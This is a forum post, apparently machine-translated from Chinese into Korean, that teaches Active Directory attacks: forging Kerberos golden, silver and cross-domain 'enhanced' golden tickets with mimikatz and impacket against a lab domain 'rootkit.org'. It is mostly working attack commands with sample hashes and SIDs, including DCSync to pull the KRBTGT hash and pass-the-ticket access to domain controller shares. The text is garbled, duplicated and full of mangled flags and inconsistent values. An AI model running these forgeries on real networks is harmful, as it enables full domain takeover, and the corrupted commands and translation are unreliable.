KoreanHackerTeam
Moderator
청구서를 잊어 버립니다
2. 도메인의 SID 값
3. 도메인의 KRBTGT 계정 비밀번호 해시
4. 단조 사용자 이름은 그럴 수 있습니다
1LSADUMP
CSYNC /owa2013.ROOTKIT.org /USER:KRBTGT KRBTGT HASH를 얻은 다음 Kerberos:33600Golden은 Mimikatz에서 Golden.kiribi를 생성합니다.
/사용자 : 단조 사용자 이름
/도메인 : 도메인 이름
/SID : SID 값,注意是去掉最后一个-后面的值/KRBTGT : KRBTGT의 해시 값
/ptt : 그것은 티켓 공격을 통과하여 생성 된 티켓을 메모리로 가져오고 사용하기 전에 /티켓을 사용하여 내보낼 수도 있습니다.
12mimikatz.exe 'Kerberos3333333:Golden /user:administrator /domnain333333:rootkit.org /SID:S-1-5-21-3759881954-2993291187-357808 /KRBTGT:C3D5042C67EF5F5F461D0BA6ECDD9EA449 /PTT 'EXITKLIST /KERBEROS:33600LIST는 DIR을 통해 도메인 제어 공유 폴더에 성공적으로 액세스 할 수 있습니다.
1DIR \\ OWA2013.ROOTKIT.org \ C $
어떤 서비스를 사용해야합니까? 공격자가 Kerberos Silver 티켓을 사용하여 Exploit Systems https://adsecurity.org/?p=2011을 참조하십시오.
서비스 유형
서비스 실버 티켓
WMI
호스트, RPCS
PowerShell 리모 팅
호스트, HTTP (WSMAN, RPCSS)
Winrm
호스트, HTTP
예정된 작업
주인
Windows 파일 공유 (CIFS)
CIFS
Mimikatz dcsync를 포함한 LDAP 작업
ldap
Windows 원격 서버 관리 도구
RPCSS, LDAP, CIFS
TGT는 PAC로 제한 되었기 때문에
클라이언트가 인증 된 서비스 (SID의 가치를 통한)이므로 지정된 서비스에만 액세스 할 수 있습니다.
2. 도메인 SID
3. 완전 자격을 갖춘 도메인 이름은 대상 서버의 정규화 된 도메인 이름, 즉 호스트 이름과 도메인 이름이 모두있는 이름입니다.)
4. 사용 가능한 서비스 (대상 서버에서 실행되는 Kerberos 서비스, CIFS, HTTP, MSSQL 등과 같은 서비스 원명 유형)
5. 서비스 계정의 NTLM 해시 (도메인 컨트롤러 머신 계정 인 경우 DC가 중단되었음을 의미합니다)
6. 위조 해야하는 사용자 이름은 그 어느 것도 될 수 있습니다.
매개 변수 설명 :
/도메인 : 현재 도메인 이름
/sid : 골드 티켓과 마찬가지로 Sid Value는 이전 부분을 취하십시오.
/target : 대상 호스트, 여기에 OWA2013.ROOTKIT.org가 있습니다
/서비스 : 서비스 이름, 여기에서 공유 파일에 액세스해야하므로 CIFS입니다.
/RC4 : NTLM 해시 서비스 계정 가치 (OWA2013 $)
/사용자 : 단조 사용자 이름
/ptt : 그것은 티켓 공격을 통과하여 생성 된 티켓을 메모리로 가져오고 사용하기 전에 /티켓을 사용하여 내보낼 수도 있습니다.
kerberos33333
tt를 사용하여 가져 오십시오
1234567891. 단조 된 CIFS 서비스 권한 Mimikatz 'Kerberos33333:Golden /domnain333333:RootKit.org /SID:S-1-5-21-3759881954-2993291187-35757808 /target:OWA2013.rootkit.org /service:cifs /rc4:ddd2162e8606006dcca0e29b7819721a /user:silver /ptt' exitklistdir \\OWA2013.rootkit.org\c$2. 단조 된 LDAP 서비스 권한 Mimikatz 'Kerberos333:Golden /Domnain:RootKit.org /SID3:S-1-5-21-3759881954-2993291187-3577547808 /TARGET3360OWA2013.ROOTKIT.ORG /Service:LDAP /RC4DDDDDDDDDDDD2162E8606006DCCA0E29B7819721A /USER:SILVER /PTT 'EXITKLISTMIKATZ'LSADUMP:3CSYNC /DC333333333333333333333333333333333333333333333333333333333333333:OWA2013.ROTKIT /domain3360rootkit.org /user:KRBTGT 'EXIT .
그러나普通的金票不能够跨域使用, 즉 금 티켓의 권한은 현재 도메인으로 제한됩니다.
또한 Test.org는 별도의 도메인 트리,两个域树Rootkit.org이며 Test.org는域林이라고합니다.
이 도메인은 Enterprise Admins Group을 기반으로 이러한 권한 부서를 구현합니다.
rootkit.org의 도메인 제어에서 Enterprise Admins Group의 제거는 519입니다.
News.rootkit.org이 하위 도메인의 관리자 사용자 인이 관리자는 현재 도메인에서 가장 높은 권한을 가지고 있습니다.
이전 도메인의 SID 값은 마이그레이션可以跨域的金票동안 LDAP 라이브러리의 Sidhistory 속성에 저장되었습니다.
根域의 SID를 알고 있다면 Mimikatz를 사용하여 KRBTGT子域의 해시 가치를 통해 Enterpriseadmins Group 권한 (도메인 포레스트에서 가장 높은 권한)으로 티켓을 만들 수 있습니다.
그런 다음 Mimikatz를 통해 루트 도메인 SID를 포함하는 새로운 금 티켓을 재생
1mimikatz 'Kerberos:golden /admin:administrator /domain:news.rootkit.org` /SID:SID /SIDS:ROOT 도메인 SIDS /KRBTGT:SUBDOMAIN KRBTGT HASH /STARKOFFSET3336660 /endin:600 /RenewMax:10080 /ptt '종료 참조 : https://adsecurity.org/?p=1640
startofffffset 및 endin은 각각 오프셋과 길이를 나타내며 RenewMax는 생성 된 티켓의 최대 시간을 나타냅니다.
루트 도메인 rootkit.org의 비밀번호 해시를 알지 못하고 Subdomain News.rootkit.org에서 KRBTGT의 비밀번호 해시를 사용하십시오.
그런 다음 Dir를 통해 OWA2013.ROOTKIT.org의 공유 폴더에 액세스 할 수 있습니다. 현재이 티켓은 전체 도메인 포레스트를 제어 할 수 있습니다.
github.com
黄金票据
GoldenTicket
https://www.se7ensec.cn/2021/10/20/域渗透-Kerberos域议% A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%9E%90/#%E9%BB%84%E9%87%91%E7%A5%a8%E6%8D%AE简介
골든 티켓 (골든 티켓이라고 함)은 위조 된 TGT (TicketGranting 티켓)입니다. 금 표를 사용하면 도메인에서 가장 높은 권한이 있다고 말할 수 있습니다.制作金票的条件
1. 도메인 이름2. 도메인의 SID 값
3. 도메인의 KRBTGT 계정 비밀번호 해시
4. 단조 사용자 이름은 그럴 수 있습니다
利用过程
mimikatz
골드 티켓 생성에는 KRBTGT의 해시 가치가 필요합니다. Mimikatz의 명령을 통해 KRBTGT의 가치를 얻을 수 있습니다.1LSADUMP
CSYNC /owa2013.ROOTKIT.org /USER:KRBTGT KRBTGT HASH를 얻은 다음 Kerberos:33600Golden은 Mimikatz에서 Golden.kiribi를 생성합니다./사용자 : 단조 사용자 이름
/도메인 : 도메인 이름
/SID : SID 값,注意是去掉最后一个-后面的值/KRBTGT : KRBTGT의 해시 값
/ptt : 그것은 티켓 공격을 통과하여 생성 된 티켓을 메모리로 가져오고 사용하기 전에 /티켓을 사용하여 내보낼 수도 있습니다.
12mimikatz.exe 'Kerberos3333333:Golden /user:administrator /domnain333333:rootkit.org /SID:S-1-5-21-3759881954-2993291187-357808 /KRBTGT:C3D5042C67EF5F5F461D0BA6ECDD9EA449 /PTT 'EXITKLIST /KERBEROS:33600LIST는 DIR을 통해 도메인 제어 공유 폴더에 성공적으로 액세스 할 수 있습니다.
1DIR \\ OWA2013.ROOTKIT.org \ C $
impacket
123456781. 티켓 KLIST PURGE2를 지우십시오. CCACH 파일 Python Ticketer.py -Nthash C3D5042C67EF5F461D0BA6ECDDDD9EA449- 도메인 SID S-1-5-21-375981954-2993291187-3577547808- Domalain RootKit.org Administrator3. 환경 변수 설정 krb5cname=administrator.ccache/내보내기 krb5ccname=admination.ccache4. 검증 결과 Python wmiexec.py rootkit.org/administrator@owa2013 -k-no-pass白银票据
SilverTickets
https://www.se7ensec.cn/2021/10/20/域渗透-Kerberos域议% A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%9E%90/#%E7%99%BD%E9%93%B6%e7%A5%E6%8D%AE어떤 서비스를 사용해야합니까? 공격자가 Kerberos Silver 티켓을 사용하여 Exploit Systems https://adsecurity.org/?p=2011을 참조하십시오.
서비스 유형
서비스 실버 티켓
WMI
호스트, RPCS
PowerShell 리모 팅
호스트, HTTP (WSMAN, RPCSS)
Winrm
호스트, HTTP
예정된 작업
주인
Windows 파일 공유 (CIFS)
CIFS
Mimikatz dcsync를 포함한 LDAP 작업
ldap
Windows 원격 서버 관리 도구
RPCSS, LDAP, CIFS
TGT는 PAC로 제한 되었기 때문에
简介
은 티켓 (이하 실버 메모라고 함)이 위조 된 ST (서비스 티켓)입니다.클라이언트가 인증 된 서비스 (SID의 가치를 통한)이므로 지정된 서비스에만 액세스 할 수 있습니다.
制作银票的条件
1. 도메인 이름2. 도메인 SID
3. 완전 자격을 갖춘 도메인 이름은 대상 서버의 정규화 된 도메인 이름, 즉 호스트 이름과 도메인 이름이 모두있는 이름입니다.)
4. 사용 가능한 서비스 (대상 서버에서 실행되는 Kerberos 서비스, CIFS, HTTP, MSSQL 등과 같은 서비스 원명 유형)
5. 서비스 계정의 NTLM 해시 (도메인 컨트롤러 머신 계정 인 경우 DC가 중단되었음을 의미합니다)
6. 위조 해야하는 사용자 이름은 그 어느 것도 될 수 있습니다.
利用过程
mimikatz
우선 서비스 계정 해시의 비밀번호를 알아야합니다. 여기서도 도메인 제어를 예제로 사용합니다 (관리자 계정의 해시는 여기에 사용되지 않지만 OWA2013 $).매개 변수 설명 :
/도메인 : 현재 도메인 이름
/sid : 골드 티켓과 마찬가지로 Sid Value는 이전 부분을 취하십시오.
/target : 대상 호스트, 여기에 OWA2013.ROOTKIT.org가 있습니다
/서비스 : 서비스 이름, 여기에서 공유 파일에 액세스해야하므로 CIFS입니다.
/RC4 : NTLM 해시 서비스 계정 가치 (OWA2013 $)
/사용자 : 단조 사용자 이름
/ptt : 그것은 티켓 공격을 통과하여 생성 된 티켓을 메모리로 가져오고 사용하기 전에 /티켓을 사용하여 내보낼 수도 있습니다.
kerberos33333
tt를 사용하여 가져 오십시오1234567891. 단조 된 CIFS 서비스 권한 Mimikatz 'Kerberos33333:Golden /domnain333333:RootKit.org /SID:S-1-5-21-3759881954-2993291187-35757808 /target:OWA2013.rootkit.org /service:cifs /rc4:ddd2162e8606006dcca0e29b7819721a /user:silver /ptt' exitklistdir \\OWA2013.rootkit.org\c$2. 단조 된 LDAP 서비스 권한 Mimikatz 'Kerberos333:Golden /Domnain:RootKit.org /SID3:S-1-5-21-3759881954-2993291187-3577547808 /TARGET3360OWA2013.ROOTKIT.ORG /Service:LDAP /RC4
DDDDDDDDDDDD2162E8606006DCCA0E29B7819721A /USER:SILVER /PTT 'EXITKLISTMIKATZ'LSADUMP:3CSYNC /DC333333333333333333333333333333333333333333333333333333333333333:OWA2013.ROTKIT /domain3360rootkit.org /user:KRBTGT 'EXIT .impacket
123456781. Forge CIFS 서비스 권한 Python3 Ticketer.py -Nthash DDD2162E8606006DCCA0E29B7819721A- SHESID S-1-5-21-3759881954-2993291187-3577547808 -Domain rootkit.org -dc-ip 192.168.3.144 -spn cifs/owa2013.rootkit.org silver2. Forge LDAP 서비스 권한 Python3 Ticketer.py -Nthash DDD2162E8606006DCCA0E29B7819721A -Domain-SID S-1-5-21-3759881954-2993291187-3577547808-Domain rootkit.org-DC-IP 192.168.3.168. -spn ldap/owa2013.rootkit.org silverset krb5cname=silver.ccache/내보내기 krb5cname=silver.ccachepython wmiexec.py -k owa2013.rootkit.org增强版的黄金票据
3330EnhancedGolden Tickets
krbtg t to hash hash hash hash hash hash hash hash hash hash hash. 도메인 제어 권한을 얻을 수 있도록 금 티켓을 생성하고 도메인의 다른 호스트의 모든 서비스에 액세스 할 수 있습니다.그러나普通的金票不能够跨域使用, 즉 금 티켓의 권한은 현재 도메인으로 제한됩니다.
域树与域林
News.rootkit.org 및 dev.rootkit.org는 rootkit.org의 하위 도메인 이며이 세 가지 도메인은 도메인 트리를 형성합니다.또한 Test.org는 별도의 도메인 트리,两个域树Rootkit.org이며 Test.org는域林이라고합니다.
普通金票的局限性
루트 도메인과 다른 도메인의 가장 큰 차이점은 루트 도메인이 전체 도메인 포레스트를 제어한다는 것입니다.이 도메인은 Enterprise Admins Group을 기반으로 이러한 권한 부서를 구현합니다.
Enterprise Admins组
Enterpriseadmins Group 은이 그룹의 구성원 인只存在于一个林中的根域中의 도메인의 사용자 그룹입니다.이 그룹의 구성원은 rootkit.org의 관리자 사용자 (不是本地的Administrator,是域中的Administrator)가 도메인에 대해完全管理控制权을 가지고 있습니다.rootkit.org의 도메인 제어에서 Enterprise Admins Group의 제거는 519입니다.
Domain Admins组
하위 도메인은不存在Enterpriseadmins Group이며子域中权限最高的组에서는 도메인 관리자 그룹입니다.News.rootkit.org이 하위 도메인의 관리자 사용자 인이 관리자는 현재 도메인에서 가장 높은 권한을 가지고 있습니다.
利用过程
mimikatz
일반 금 음표는 현재 도메인으로 제한되며 2015 년에 중국의 Black Hat USA의 연구원들은突破域限制的增强版的黄金票据을 제안했습니다.이전 도메인의 SID 값은 마이그레이션可以跨域的金票동안 LDAP 라이브러리의 Sidhistory 속성에 저장되었습니다.
根域의 SID를 알고 있다면 Mimikatz를 사용하여 KRBTGT子域의 해시 가치를 통해 Enterpriseadmins Group 권한 (도메인 포레스트에서 가장 높은 권한)으로 티켓을 만들 수 있습니다.
그런 다음 Mimikatz를 통해 루트 도메인 SID를 포함하는 새로운 금 티켓을 재생
1mimikatz 'Kerberos:golden /admin:administrator /domain:news.rootkit.org` /SID:SID /SIDS:ROOT 도메인 SIDS /KRBTGT:SUBDOMAIN KRBTGT HASH /STARKOFFSET3336660 /endin:600 /RenewMax:10080 /ptt '종료 참조 : https://adsecurity.org/?p=1640
startofffffset 및 endin은 각각 오프셋과 길이를 나타내며 RenewMax는 생성 된 티켓의 최대 시간을 나타냅니다.
루트 도메인 rootkit.org의 비밀번호 해시를 알지 못하고 Subdomain News.rootkit.org에서 KRBTGT의 비밀번호 해시를 사용하십시오.
그런 다음 Dir를 통해 OWA2013.ROOTKIT.org의 공유 폴더에 액세스 할 수 있습니다. 현재이 티켓은 전체 도메인 포레스트를 제어 할 수 있습니다.
参考
GitHub - uknowsec/Active-Directory-Pentest-Notes: 个人域渗透学习笔记
个人域渗透学习笔记. Contribute to uknowsec/Active-Directory-Pentest-Notes development by creating an account on GitHub.
github.com